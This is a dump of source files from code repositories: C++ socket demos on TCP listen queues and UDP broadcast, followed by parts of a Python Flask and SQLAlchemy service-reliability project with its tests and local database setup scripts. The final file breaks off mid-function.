"text": "#include <cstdio>\n#include <cstdlib>\n#include <cstring>\n#include <cstdint>\n#include <unistd.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\t\t// sockaddr_in\n\nauto main(int, char**) -> int32_t {\n\tstruct sockaddr_in serverAddr;\n\t//struct sockaddr_in clientAddr;\n\n\tbzero(&serverAddr, sizeof(serverAddr));\n\tserverAddr.sin_family = AF_INET;\n\tserverAddr.sin_port = htons(1234);\n\n\t// htonl: convert values between host and network byte order(字节序)\n\tserverAddr.sin_addr.s_addr = htonl(INADDR_ANY); /* whilcared 通配地址*/ \n\tprintf(\"INADDR_ANY = %d\\n\", INADDR_ANY);\t\t// INADDR_ANY = 0\n\n\t//bzero(&clientAddr, sizeof(clientAddr));\n\t//socklen_t clientAddrLen = 0;\n\n\tint listenfd = socket(AF_INET, SOCK_STREAM, 0);\n\tint yes = 1;\n\tsetsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, (void*)&yes, sizeof(yes));\n\n\tif (listenfd < 0) {\n\t\tperror(\"Create socket fail.\\n\");\n\t\tclose(listenfd);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint bindResult = bind(listenfd, (struct sockaddr*)&serverAddr, sizeof(serverAddr));\n\tif (bindResult < 0) {\n\t\tclose(listenfd);\n\t\tperror(\"Bind socket port fail.\\n\");\n\t\texit(EXIT_FAILURE);\n\t} else {\n\t\tprintf(\"Bind socket port success.\\n\");\n\t}\n\n\t// listen 仅供 TCP 服务器调用,它做两件事:\n\t// 1) 当 socket 函数创建一个套接字时,他被假设为一个主动套接字,也就是说,\n\t// 他是一个将调用 connect 发起连接的客户套接字。listen 函数把一个未连接的\n\t// 套接字转换成一个被动套接字,指示内核应接受指向该套接字的连接请求;\n\t// 2) 函数的第二个参数规定了内核应该为相应套接字排队的最大连接个数。\n\t// listen(listenfd, 20);\t// client will connect success\n\t\n\t// 服务器并没有调用 accept,这是因为调用 listen 方法之后,内核为任何一个\n\t// 给定的监听套接字维护两个队列:未完成连接队列和已完成连接队列;当客户端\n\t// SYN 到达时,如果队列是满的,TCP 就忽略该分节,但不会发送 RST(重建连接);\n\t// 当进程调用 accept 时,已完成队列的队顶项将返回给进程,如果队列为空,则\n\t// 阻塞(套接字)默认为阻塞。\n\t//\t\t未完成连接队列(incomplete connection queue):\n\t//\t\t已完成连接队列(complete connection queue):\n\t// 也就说,只要调用了 listen 方法后,服务器端就打开了三次握手的开关,能够\n\t// 处理来自客户端的 SYN 分节了,只要三次握手完成,客户端就会 connect 成功,\n\t// 而跟服务器调不调用 accept 没有任何关系,accept 只是去取已完成连接队列\n\t// 的队顶项。\n\tsleep(60*5);\n\n\texit(EXIT_SUCCESS);\n}\n\n\n"
},
{
"alpha_fraction": 0.6194225549697876,
"alphanum_fraction": 0.6316710114479065,
"avg_line_length": 21.41176414489746,
"blob_id": "1b3acef424be28461fcc387c07ef320890141041",
"content_id": "1cb612b93a13fbfdb5e6fb9ef8fc268531f952ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1143,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 51,
"path": "/UDP_broadcast/broadcast_client/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <netdb.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <string.h>\n\n#define PORT 6000\n\nint main(int, char**) {\n\tsetvbuf(stdout, NULL, _IONBF, 0);\n\tfflush(stdout);\n\n\tint sockfd = -1;\n\tif ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {\n\t\tfprintf(stderr, \"socket error.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tconst int opt = -1;\n\t// set socket type broadcast \n\tint nb = 0;\n\tnb = setsockopt(sockfd, SOL_SOCKET, SO_BROADCAST, (char*)&opt, sizeof(int));\n\tif (nb == -1) {\n\t\tfprintf(stderr, \"set socket error.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tstruct sockaddr_in addrto;\n\tbzero(&addrto, sizeof(sockaddr_in));\n\taddrto.sin_family = AF_INET;\n\taddrto.sin_addr.s_addr = htonl(INADDR_BROADCAST);\n\taddrto.sin_port = htons(PORT);\n\tint nlen = sizeof(sockaddr_in);\n\t\n\tfor (;;) {\n\t\tsleep(1);\n\t\t// send msg to brocast addr\n\t\tchar msg[] = {\"abcdefg\"};\n\t\tint ret = sendto(sockfd, msg, strlen(msg), 0, (sockaddr*)(&addrto), nlen);\n\t\tif (ret < 0) {\n\t\t\tfprintf(stderr, \"send error.\\n\");\n\t\t} else {\n\t\t\tprintf(\"ok\\n\");\n\t\t}\n\t}\n\texit(EXIT_SUCCESS);\n}\n"
}
] | 15 |
owlvey/owlvey_sre | https://github.com/owlvey/owlvey_sre | 6e7325822dedd967f402589d12e5bfc5daab31db | 2323f38bc673ce192e97634f968333d4fa956e26 | f952a49e7912732ba6ca46db206390d836932b50 | refs/heads/master | 2023-06-12T14:58:37.972350 | 2019-08-02T00:17:28 | 2019-08-02T00:17:28 | 197,699,516 | 0 | 0 | Apache-2.0 | 2019-07-19T04:04:06 | 2019-08-02T00:17:36 | 2023-05-22T22:16:49 | HTML | [
{
"alpha_fraction": 0.6475155353546143,
"alphanum_fraction": 0.6770186424255371,
"avg_line_length": 28.227272033691406,
"blob_id": "42c7aa8ffefdcad48dfbe5f1bb9c3d0b6facd823",
"content_id": "bc1b8ab35f7404252398acd510e8ea53e663ff83",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 644,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 22,
"path": "/app/core/UserEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass UserEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Users\"\n\n email = Column(String(256), nullable=False, unique=True)\n avatar = Column(String(1024), nullable=False)\n\n def __init__(self):\n super().__init__()\n\n def create(self, email, avatar=None):\n self.email = email\n self.avatar = avatar or \"https://cdn.iconscout.com/icon/free/png-256/avatar-375-456327.png\"\n self._validate()\n\n def _read_fields(self):\n return UserEntity.id.name\n\n"
},
{
"alpha_fraction": 0.6608391404151917,
"alphanum_fraction": 0.6608391404151917,
"avg_line_length": 20.923076629638672,
"blob_id": "b87b15b8eead1d121b902695189ceb9ebc76667f",
"content_id": "614538053c464c40df27ff54a18fb69674126c04",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 13,
"path": "/app/core/EntityUtils.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from typing import List\n\nfrom app.core.BaseEntity import BaseEntity\n\n\nclass EntityUtils:\n\n @staticmethod\n def entities_to_list_dictionaries(data: List[BaseEntity]):\n result = list()\n for item in data:\n result.append(item.to_dict())\n return result\n\n"
},
{
"alpha_fraction": 0.7426636815071106,
"alphanum_fraction": 0.7697516679763794,
"avg_line_length": 53.875,
"blob_id": "5d7812a6937eccfea2d83e794a61bc4444fb4a42",
"content_id": "fd4caeb1ed6768e3779a9f33dbf3f4542bf90fd3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 443,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 8,
"path": "/flyway_shell.bash",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n\ndatabase/flyway/flyway clean -url=jdbc:mysql://localhost:3306/sredb -user=root -password=p@ssw0rd -locations=filesystem:./database/sql/\n\ndatabase/flyway/flyway migrate -url=jdbc:mysql://localhost:3306/sredb -user=root -password=p@ssw0rd -locations=filesystem:./database/sql/\n\ndatabase/flyway/flyway info -url=jdbc:mysql://localhost:3306/sredb -user=root -password=p@ssw0rd -locations=filesystem:./database/sql/\n\n\n\n\n"
},
{
"alpha_fraction": 0.7048267126083374,
"alphanum_fraction": 0.7048267126083374,
"avg_line_length": 39.349998474121094,
"blob_id": "eec67494db1187e498cbc1be2c030325a50b0bd8",
"content_id": "cd7554101deadd441428fa8989324029b696c94a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1616,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 40,
"path": "/testing/component_test/ComponentDataSeed.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.CustomersComponent import CustomersComponent\nfrom app.components.FeaturesComponent import FeaturesComponent\nfrom app.components.ProductsComponent import ProductsComponent\nfrom app.components.ServicesComponent import ServicesComponent\nfrom testing.DataSeed import DataSeed\n\n\nclass ComponentDataSeed:\n\n def __init__(self):\n pass\n\n @staticmethod\n def build_customer(customer_component: CustomersComponent):\n name = DataSeed.generate_name(\"customer_{}\")\n customer_component.create({\"name\": name})\n customer = customer_component.get_by_name(name)\n return customer\n\n @staticmethod\n def build_product(customer_component: CustomersComponent,\n product_component: ProductsComponent):\n\n name = DataSeed.generate_name(\"product_{}\")\n customer = ComponentDataSeed.build_customer(customer_component)\n product_component.create({\"name\": name, \"customer_id\": customer[\"id\"]})\n product = product_component.get_by_name(name)\n return product\n\n @staticmethod\n def build_service(product, service_component: ServicesComponent):\n name = DataSeed.generate_name(\"service_{}\")\n service_component.create({\"name\": name, \"product_id\": product[\"id\"]})\n return service_component.get_by_name_relation_id(product[\"id\"], name)\n\n @staticmethod\n def build_feature(product, feature_component: FeaturesComponent):\n name = DataSeed.generate_name(\"feature_{}\")\n feature_component.create({\"name\": name, \"product_id\": product[\"id\"]})\n return feature_component.get_by_name(name)\n\n\n"
},
{
"alpha_fraction": 0.7842323780059814,
"alphanum_fraction": 0.7842323780059814,
"avg_line_length": 26.485713958740234,
"blob_id": "705fc2c3991c2bb13ee459eccb750e99e706c037",
"content_id": "573675ea85014cc7f944fd3ee89789e455a9a8a3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 964,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 35,
"path": "/app/startup.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import os\nfrom app.controllers.CustomersController import api as customers_api\nfrom app.controllers.UsersController import api as users_api\nfrom app.controllers.ProductsController import api as products_api\nfrom app.controllers.SquadsController import api as squads_api\nfrom app.controllers.ServicesController import api as services_api\nfrom app.controllers.FeaturesController import api as features_api\n\nfrom flask import Flask\n\nos.environ[\"environment\"] = \"dev\"\n\nfrom app.repositories.database import db_session\n\napp = Flask(__name__)\napp.register_blueprint(users_api)\napp.register_blueprint(customers_api)\napp.register_blueprint(products_api)\napp.register_blueprint(squads_api)\napp.register_blueprint(services_api)\napp.register_blueprint(features_api)\n\n\[email protected]('/')\ndef hello_world():\n return 'Hello, World!'\n\n\[email protected]_appcontext\ndef shut_down_session(exception=None):\n db_session.remove()\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n"
},
{
"alpha_fraction": 0.6808510422706604,
"alphanum_fraction": 0.6808510422706604,
"avg_line_length": 14,
"blob_id": "e2715d91f8f287e350c8f58ebe4d7c99193316d9",
"content_id": "d017ec214b9be69c70c6f83b700634dc15d018d6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 47,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 3,
"path": "/diagrams.bash",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# brew install graphviz\n\n\n"
},
{
"alpha_fraction": 0.6777408719062805,
"alphanum_fraction": 0.6777408719062805,
"avg_line_length": 22.076923370361328,
"blob_id": "fc06b165b8313b08f394b43c586fe21b6156182f",
"content_id": "ef7fedfa85c0a9dd22f5659b4848dde4ab489ac6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 301,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 13,
"path": "/testing/unittest/test_product_entity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom app.core.ProductEntity import ProductEntity\n\n\nclass TestCustomerEntity(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_maintenance(self):\n entity = ProductEntity()\n entity.create(name=\"[email protected]\")\n self.assertEqual(entity.name, \"[email protected]\")\n\n"
},
{
"alpha_fraction": 0.6720321774482727,
"alphanum_fraction": 0.6740442514419556,
"avg_line_length": 24.487178802490234,
"blob_id": "094462dad3faac4787ac7c1a955277ded9568cc6",
"content_id": "edfdb78335386098d70e8e39cd278eb7df544729",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 994,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 39,
"path": "/testing/integration_test/test_users_repository.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom app.components.ConfigurationComponent import ConfigurationComponent\nfrom app.core.UserEntity import UserEntity\nfrom app.core.UsersFrame import UsersFrame\nfrom app.repositories.UsersRepository import UsersRepository\nfrom app.repositories.database import db_session\n\n\nclass TestUsersRepository(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n db_session.remove()\n\n def test_get_all(self):\n configuration = ConfigurationComponent()\n repository = UsersRepository(configuration)\n user = UserEntity(\"cambio\")\n repository.create(user)\n\n data = UserEntity.query.all()\n\n frame = repository.list()\n data = frame.to_dict()\n self.assertTrue(data)\n frame = repository.get_one(data[0][\"user_id\"])\n data = frame.to_dict()\n repository.delete_one(data[0][\"user_id\"])\n self.assertTrue(data)\n\n\ndef main():\n unittest.main()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5849056839942932,
"alphanum_fraction": 0.5956873297691345,
"avg_line_length": 28.078947067260742,
"blob_id": "b74711e59b7b924a4b5cbc14b190ce9216d073bc",
"content_id": "3dc5269e61d38e1032c940454af271de94194e24",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1113,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 38,
"path": "/testing/unittest/test_user_entity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom app.core.UserEntity import UserEntity\n\n\nclass TestUserEntity(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_maintenance(self):\n user = UserEntity()\n user.from_dict({\"id\": 123, \"email\": \"[email protected]\"}, force=True)\n self.assertEqual(user.email, \"[email protected]\")\n self.assertEqual(user.id, 123)\n\n def test_validate_avatar(self):\n user = UserEntity()\n user.create(\"email@test\")\n\n def test_validate_email_none(self):\n user = UserEntity()\n self.assertRaises(ValueError, lambda: user.create(None, avatar=\"\"))\n\n def test_to_dict(self):\n user = UserEntity()\n user.from_dict({\"id\": 123, \"email\": \"[email protected]\"}, force=True)\n result = user.to_dict()\n self.assertTrue(result)\n self.assertTrue(\"email\" in result)\n\n def test_to_hidden(self):\n user = UserEntity()\n user.from_dict({\"id\": 123, \"email\": \"[email protected]\"}, force=True)\n user._hidden_fields = [\"email\"]\n result = user.to_dict()\n self.assertTrue(result)\n self.assertFalse(\"email\" in result)\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6779935359954834,
"alphanum_fraction": 0.6779935359954834,
"avg_line_length": 27.045454025268555,
"blob_id": "12cd7be70b5989f039023d9163344e3b19eb9457",
"content_id": "4df9820889e3c995ec4f818ae8c6cb419fc94cfc",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 618,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 22,
"path": "/app/core/SubscriptionEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass SubscriptionEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Subscriptions\"\n\n customer_id = Column(Integer, ForeignKey('Customers.id'))\n user_id = Column(Integer, ForeignKey('Users.id'))\n\n def __init__(self):\n super().__init__()\n\n def create(self, customer_id, user_id):\n self.customer_id = customer_id\n self.user_id = user_id\n self._validate()\n\n def _read_fields(self):\n return SubscriptionEntity.id.name\n\n"
},
{
"alpha_fraction": 0.6914414167404175,
"alphanum_fraction": 0.6914414167404175,
"avg_line_length": 26.75,
"blob_id": "eacf9507be9b40c1a0b669dd931f0e694073fe0b",
"content_id": "8f5204eb79dfbd5b5bfc2e1362ec604841c4967d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 16,
"path": "/app/components/UsersComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.UserEntity import UserEntity\n\n\nclass UsersComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return UserEntity()\n\n def get_by_email(self, email):\n user = UserEntity.query.filter(UserEntity.email == email).first()\n return user.to_dict()\n"
},
{
"alpha_fraction": 0.6537216901779175,
"alphanum_fraction": 0.6844660043716431,
"avg_line_length": 28.380952835083008,
"blob_id": "de19595578598936f9eb72bc9d706cf228d0a648",
"content_id": "3d07bcefa2fbae4db479b305c845cbcce0f32705",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 618,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 21,
"path": "/app/core/SquadEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass SquadEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Squads\"\n\n name = Column(String(256), nullable=False, unique=True)\n avatar = Column(String(1024), nullable=False)\n\n def __init__(self):\n super().__init__()\n\n def create(self, name, avatar=None):\n self.name = name\n self.avatar = avatar or \"https://cdn.iconscout.com/icon/free/png-256/avatar-375-456327.png\"\n\n def _read_fields(self):\n return SquadEntity.id.name\n\n"
},
{
"alpha_fraction": 0.6904024481773376,
"alphanum_fraction": 0.7306501269340515,
"avg_line_length": 17.823530197143555,
"blob_id": "892035eb98b001cfec182f71eed0e8a0afd340be",
"content_id": "0c6266ddacb14c3e138e38f39b767ff0f0febd3d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 323,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 17,
"path": "/README.md",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "# owlvey_sre\nowlvey_sre\n\n\n\n## dependencies \n\n### mysql docker\ndocker pull mysql:8.0\ndocker network create --driver bridge sre-net\ndocker run --name sre-mysql -p 3306:3306 --network sre-net -e MYSQL_ROOT_PASSWORD=p@ssw0rd -d mysql:8.0\ndocker start instanceid\n\ndocker ps \n\n### api flask\npip3 install -r requirements.txt \n\n\n"
},
{
"alpha_fraction": 0.604651153087616,
"alphanum_fraction": 0.604651153087616,
"avg_line_length": 22.724138259887695,
"blob_id": "039f940b9adc46a9207b4a60e6b82000519be264",
"content_id": "7450676ee0f84047bcff91a56889b401a1da9762",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 688,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 29,
"path": "/app/core/UsersFrame.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import pandas as pd\n\nfrom app.core.BaseFrame import BaseFrame\n\n\nclass UsersFrame(BaseFrame):\n\n def __init__(self):\n super().__init__()\n self._frame = pd.DataFrame(columns=self.get_metadata())\n\n def get_metadata(self):\n return [\"user_id\", \"email\"]\n\n def get_schema(self):\n return \"Users\"\n\n def add(self, name):\n self._frame = self._frame.append(data, ignore_index=True)\n\n def load_data(self, data):\n self._frame = pd.DataFrame(data, columns=self.get_metadata())\n\n def to_dict(self, orient=\"records\"):\n return self._frame.to_dict(orient=orient)\n\n def __str__(self):\n print(self._frame.head())\n return \"ok\"\n"
},
{
"alpha_fraction": 0.7275640964508057,
"alphanum_fraction": 0.7275640964508057,
"avg_line_length": 25,
"blob_id": "a4148ff529cdcbf8a0bf76268dac0f838d6ea068",
"content_id": "db89600eaf544647ebaccf036377cc1fa0ddfbf6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 312,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 12,
"path": "/app/components/SourcesComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.SourceEntity import SourceEntity\n\n\nclass SourcesComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return SourceEntity()\n"
},
{
"alpha_fraction": 0.6926605701446533,
"alphanum_fraction": 0.6926605701446533,
"avg_line_length": 27.866666793823242,
"blob_id": "82a1236aee99cfa3cb0f65fea204e9cd891b2983",
"content_id": "1af8268fb67b5a39cf88e31d6301fac51d6a555b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 15,
"path": "/app/components/CustomersComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.CustomerEntity import CustomerEntity\n\n\nclass CustomersComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> CustomerEntity:\n return CustomerEntity()\n\n def get_by_name(self, name):\n customer = CustomerEntity.query.filter(CustomerEntity.name == name).first()\n return customer.to_dict()\n\n\n\n"
},
{
"alpha_fraction": 0.6216739416122437,
"alphanum_fraction": 0.6221576929092407,
"avg_line_length": 33.949153900146484,
"blob_id": "3fed491ee6fb8c1a15acf0c1b8b40011e1234bbd",
"content_id": "e81ae62c8c3f0c097369c5b1af60f03d90b33046",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2067,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 59,
"path": "/app/components/BaseComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.core.BaseEntity import BaseEntity\nfrom app.core.EntityUtils import EntityUtils\nfrom app.repositories.EntityRepository import EntityRepository\nfrom abc import abstractmethod\n\n\nclass BaseComponent:\n\n def __init__(self):\n self._repository = EntityRepository()\n\n @abstractmethod\n def _build_entity(self) -> BaseEntity:\n pass\n\n def create(self, data):\n entity = self._build_entity()\n entity.create(**data)\n self._repository.create(entity)\n\n def list(self):\n entity = self._build_entity()\n entity_type = type(entity)\n items = entity_type.query.all()\n return EntityUtils.entities_to_list_dictionaries(items)\n\n def get(self, key):\n entity = self._build_entity()\n entity_type = type(entity)\n item = entity_type.query.filter(entity_type.id == key).first()\n return item.to_dict() if item else None\n\n def delete(self, key):\n entity = self._build_entity()\n entity_type = type(entity)\n item = entity_type.query.filter(entity_type.id == key).first()\n self._repository.delete(item)\n\n def update(self, data):\n entity = self._build_entity()\n entity_type = type(entity)\n item = entity_type.query.filter(entity_type.id == data[entity_type.id.name]).first()\n item.from_dict(data)\n self._repository.update(item)\n return item.to_dict()\n\n def get_by_name(self, name):\n entity = self._build_entity()\n entity_type = type(entity)\n entity = entity_type.query.filter(entity_type.name == name).first()\n return entity.to_dict()\n\n def get_by_name_relation_id(self, relation_id, name):\n entity = self._build_entity()\n entity_type = type(entity)\n relationship = next((x for x in entity.__table__.columns if len(x.foreign_keys) > 0), None)\n entity = entity_type.query.filter(getattr(entity_type, relationship.name) == relation_id and\n entity_type.name == name).first()\n return entity.to_dict()\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6948775053024292,
"alphanum_fraction": 0.6948775053024292,
"avg_line_length": 27.0625,
"blob_id": "9dfdc12db7dbb82cff5c2c2712df0af06a275a3c",
"content_id": "9136c092649cef218a2aa91478872eb9e594275b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 449,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 16,
"path": "/app/components/SquadsComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.SquadEntity import SquadEntity\n\n\nclass SquadsComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return SquadEntity()\n\n def get_by_namea(self, name):\n squad = SquadEntity.query.filter(SquadEntity.name == name).first()\n return squad.to_dict()\n"
},
{
"alpha_fraction": 0.7099999785423279,
"alphanum_fraction": 0.7099999785423279,
"avg_line_length": 37.71428680419922,
"blob_id": "e24a037e1769d8652ac9e6bac0382533c245a74d",
"content_id": "16fc548d6091b9c582c787b2068576a4e4b080a3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1100,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 28,
"path": "/testing/component_test/test_customers_component.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom app.components.CustomersComponent import CustomersComponent\nfrom app.components.SubscriptionsComponent import SubscriptionsComponent\nfrom app.components.UsersComponent import UsersComponent\nfrom testing.DataSeed import DataSeed\n\n\nclass TestCustomersComponent(unittest.TestCase):\n\n def setUp(self):\n self.customer_component = CustomersComponent()\n self.user_component = UsersComponent()\n self.subscription_component = SubscriptionsComponent()\n\n def test_maintenance(self):\n email = DataSeed.generate_name(\"account{}@email.com\")\n name = DataSeed.generate_name(\"name {}\")\n self.customer_component.create({\"name\": name})\n self.user_component.create({\"email\": email})\n customer = self.customer_component.get_by_name(name)\n user = self.user_component.get_by_email(email)\n\n self.subscription_component.create({\"customer_id\": customer[\"id\"], \"user_id\": user[\"id\"]})\n\n subscription = self.subscription_component.get_by_customer_user(customer[\"id\"], user[\"id\"])\n\n self.assertTrue(subscription)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6957446932792664,
"alphanum_fraction": 0.7021276354789734,
"avg_line_length": 26.58823585510254,
"blob_id": "7d98cb7bce97c4050ef2f9109520d1e8c6578c9a",
"content_id": "2e657e63b6d4b12a6a924424be474b09d7269909",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 470,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 17,
"path": "/app/core/ProductEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass ProductEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Products\"\n\n name = Column(String(256), nullable=False, unique=False)\n customer_id = Column(Integer, ForeignKey('Customers.id'))\n\n def __init__(self):\n super().__init__()\n\n def _read_fields(self):\n return ProductEntity.id.name\n\n"
},
{
"alpha_fraction": 0.5195390582084656,
"alphanum_fraction": 0.5205410718917847,
"avg_line_length": 28.776119232177734,
"blob_id": "00d3b069c0b2ac2c625f3d54e8d60fd2e9487bc7",
"content_id": "4150ac4926338fe0bae851eb3854a37415ff43d4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1996,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 67,
"path": "/app/repositories/BaseRepository.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.ConfigurationComponent import ConfigurationComponent\nimport mysql.connector\n\nfrom app.core.BaseFrame import BaseFrame\n\n\nclass BaseRepository:\n def __init__(self, configuration: ConfigurationComponent):\n self._configuration = configuration\n\n def _build_connection(self):\n db = mysql.connector.connect(\n host=self._configuration.db_host,\n user=self._configuration.db_username,\n passwd=self._configuration.db_password,\n database=self._configuration.db_name,\n auth_plugin='mysql_native_password'\n )\n return db\n\n def _list(self, frame: BaseFrame):\n try:\n db = self._build_connection()\n cursor = db.cursor()\n cursor.execute(\"SELECT {} FROM {}\".format(\",\".join(frame.get_metadata()), frame.get_schema()))\n frame.load_data(list(cursor))\n finally:\n if db:\n db.close()\n if cursor:\n cursor.close()\n\n return frame\n\n def _get_one(self, frame, key):\n try:\n db = 